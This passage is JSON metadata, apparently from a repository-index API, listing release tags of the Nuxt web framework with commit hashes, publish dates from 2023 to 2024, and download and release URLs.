3.10.1","sha":"460e0cfebd0ad19c7928c8d986e59f93a1bba1a3","kind":"commit","published_at":"2024-02-05T16:48:47.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.1/manifests"},{"name":"v3.10.0","sha":"da3c502f08587f93e1134bc8e7aea1dee8d628fb","kind":"commit","published_at":"2024-01-30T15:25:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.10.0/manifests"},{"name":"v3.9.3","sha":"fd8b263326c8703815a7e043948c22a8e5b969e2","kind":"commit","published_at":"2024-01-17T14:19:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.3/manifests"},{"name":"v3.9.2","sha":"97ed2df423ebd8038f16d81e00cd2836ba2d712a","kind":"commit","published_at":"2024-01-16T17:00:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.2/manifests"},{"name":"v2.17.3","sha":"4aa989d68a1934bd107fc5ad4e87549d39277ecd","kind":"tag","published_at":"2024-01-12T15:13:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.3/manifests"},{"name":"v3.9.1","sha":"6736decba0dc8bbc7276848a8a26973440ebdee4","kind":"commit","published_at":"2024-01-05T21:55:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.1/manifests"},{"name":"v3.9.0","sha":"c28ef02a1779b1c8a30c3daa2049d3c81a88ac91","kind":"commit","published_at":"2023-12-25T17:24:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.9.0/manifests"},{"name":"v3.8.2","sha":"8d1fc6c4a9b0f6a662a006489162e66fdeb677b1","kind":"commit","published_at":"2023-11-20T22:22:16.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.2/manifests"},{"name":"v3.8.1","sha":"d8674b99820d0e4dd620b20d38efb2ee52c80e52","kind":"commit","published_at":"2023-11-06T11:54:29.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.1/manifests"},{"name":"v2.17.2","sha":"2080d82471962a5a6ea2c7b38c8975c961e919f8","kind":"tag","published_at":"2023-10-24T03:05:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.2/manifests"},{"name":"v3.8.0","sha":"59ff865b133aaf82876f73b2d0566a00081b2795","kind":"commit","published_at":"2023-10-19T15:21:54.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.8.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.8.0/manifests"},{"name":"v3.7.4","sha":"5abd8a231f26a2e08071a59caa87b80eaaa6cd91","kind":"commit","published_at":"2023-09-26T00:18:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.4/manifests"},{"name":"v3.7.3","sha":"16e40f899e753208dd270c30869d240fbff0b8a2","kind":"commit","published_at":"2023-09-13T22:52:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.3/manifests"},{"name":"v3.7.2","sha":"ebacf199fe52b9dfd5cb48f2f4735df0e9adbaac","kind":"commit","published_at":"2023-09-12T21:35:55.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.2/manifests"},{"name":"v3.7.1","sha":"88a6d0a499cc7696bff94c02548cd9cc60f7820b","kind":"commit","published_at":"2023-09-05T13:49:23.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.1/manifests"},{"name":"v3.7.0","sha":"9013f88e75f499e650463e3c80d116d0ce898a14","kind":"commit","published_at":"2023-08-25T23:26:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.7.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.7.0/manifests"},{"name":"@nuxt/ui-templates@1.3.1","sha":"26a0745b9cc3a60aa8bf86c74ab3ff7ec4717058","kind":"tag","published_at":"2023-07-29T03:33:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.1/manifests"},{"name":"@nuxt/ui-templates@1.3.0","sha":"039126dac7070eeae2eae16fcb423f6b77a4fc0d","kind":"tag","published_at":"2023-07-28T16:37:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.3.0/manifests"},{"name":"@nuxt/ui-templates@1.2.1","sha":"57e237b03ecb63319727dd407f01be6c6540deab","kind":"tag","published_at":"2023-07-26T09:19:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.1/manifests"},{"name":"v3.6.5","sha":"f6a3adb52156774ab372829a2ee2533906758288","kind":"commit","published_at":"2023-07-19T17:40:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.5/manifests"},{"name":"v3.6.4","sha":"380a91985c350281aba2d8eb16c65b0ebc39ea8b","kind":"commit","published_at":"2023-07-19T15:19:14.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.4/manifests"},{"name":"v3.6.3","sha":"f068ad5edda4aaf79906a58ab472c9c3c0f564f1","kind":"commit","published_at":"2023-07-14T22:48:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.3/manifests"},{"name":"v2.17.1","sha":"9de25afa865ca6861a7bb6e3b6b89df56616d93d","kind":"tag","published_at":"2023-07-14T22:35:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.1/manifests"},{"name":"v3.6.2","sha":"88f914e9a01cb8ed196afb653dbcb4f7a5123b15","kind":"commit","published_at":"2023-07-05T21:42:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.2/manifests"},{"name":"v3.6.1","sha":"54a0d5e8dc2184f995169e6b4c5adaba9cffaa6c","kind":"commit","published_at":"2023-06-26T19:25:37.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.1/manifests"},{"name":"v3.6.0","sha":"e58cfc81f03a2323c95e6671af7deb4c4288bf39","kind":"commit","published_at":"2023-06-23T12:06:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.6.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.6.0/manifests"},{"name":"@nuxt/ui-templates@1.2.0","sha":"5f6e505ea476ed8ede4edbd4d1fb3dcae0189705","kind":"tag","published_at":"2023-06-20T11:29:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/@nuxt/ui-templates@1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/@nuxt/ui-templates@1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@%40nuxt%2Fui-templates%401.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/@nuxt%2Fui-templates@1.2.0/manifests"},{"name":"v2.17.0","sha":"1ce34ec2c438fbad9a04f7eda2ce4f439389ea9a","kind":"tag","published_at":"2023-06-09T20:51:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.17.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.17.0/manifests"},{"name":"v3.5.3","sha":"199595f3afac38b2a41be0a1c5593a8b6ea03366","kind":"commit","published_at":"2023-06-06T00:24:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.3/manifests"},{"name":"v3.5.2","sha":"d85348987f8fd0e36763de69d6c665b630532429","kind":"commit","published_at":"2023-05-29T11:48:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.2/manifests"},{"name":"v3.5.1","sha":"f13ccfe8363e3ababea7379d07822953eea555aa","kind":"commit","published_at":"2023-05-21T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.1/manifests"},{"name":"v3.5.0","sha":"9683c3dad3fc31d5a2f780f6e7e785c1eeedc797","kind":"commit","published_at":"2023-05-16T13:29:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.5.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.5.0/manifests"},{"name":"v3.4.3","sha":"1464294d6abe13b54fdb8d204732345551c8e647","kind":"commit","published_at":"2023-04-28T19:08:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.3/manifests"},{"name":"v3.4.2","sha":"607bfdcfefe3520c89202fe5a5525794792192d7","kind":"commit","published_at":"2023-04-20T13:51:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.2/manifests"},{"name":"v3.4.1","sha":"940fb0b7ad73960257f3e5f868186c302308e43b","kind":"commit","published_at":"2023-04-13T10:31:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.1/manifests"},{"name":"v3.4.0","sha":"25e3a9046cc1b3dd9c1bf2c188a627b0a9446ad2","kind":"commit","published_at":"2023-04-11T16:17:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.4.0/manifests"},{"name":"v3.3.3","sha":"8e9d7157a8d4fae6d2d0ae4598dd7c2ae14e5571","kind":"commit","published_at":"2023-04-02T14:14:21.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.3/manifests"},{"name":"v3.3.2","sha":"dd6f9c01ccea00ddb37d15ce1773a054b99f08db","kind":"commit","published_at":"2023-03-24T18:31:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.2/manifests"},{"name":"v2.16.3","sha":"6ca842e36ed935950608f02b539fc2985f5f3ef9","kind":"tag","published_at":"2023-03-17T15:39:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.3/manifests"},{"name":"v3.3.1","sha":"184d57bb1923b8bf21a372eabdb67e1241d2023f","kind":"commit","published_at":"2023-03-14T14:45:19.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.1/manifests"},{"name":"v3.3.0","sha":"2ebf5f4c4488c911e8bcc273cb8b12b86bf3562e","kind":"commit","published_at":"2023-03-14T13:22:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.3.0/manifests"},{"name":"v2.16.2","sha":"ca8b375e2eb38c452b1b227e83c2cdad6de2f030","kind":"tag","published_at":"2023-03-01T13:03:07.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v2.16.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v2.16.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v2.16.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v2.16.2/manifests"},{"name":"v3.2.3","sha":"021ba4310e47301996967c2a9b581152095cb995","kind":"commit","published_at":"2023-02-28T11:19:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.3/manifests"},{"name":"v3.2.2","sha":"3a832bacb8f747bc3df656ddb926defe607b07f3","kind":"commit","published_at":"2023-02-17T16:39:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.2/manifests"},{"name":"v3.2.1","sha":"5c47d4c5ab0add324a412c9d64700acf41b41f5b","kind":"commit","published_at":"2023-02-17T15:56:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v3.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v3.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v3.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v3.2.1/manifests"},{"name":"v2.16.1","sha":"41148648ee597424c94a31ce0f36bb742c5ec695","kind":"commit","published_at":"2023-02-13T12:08:34.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v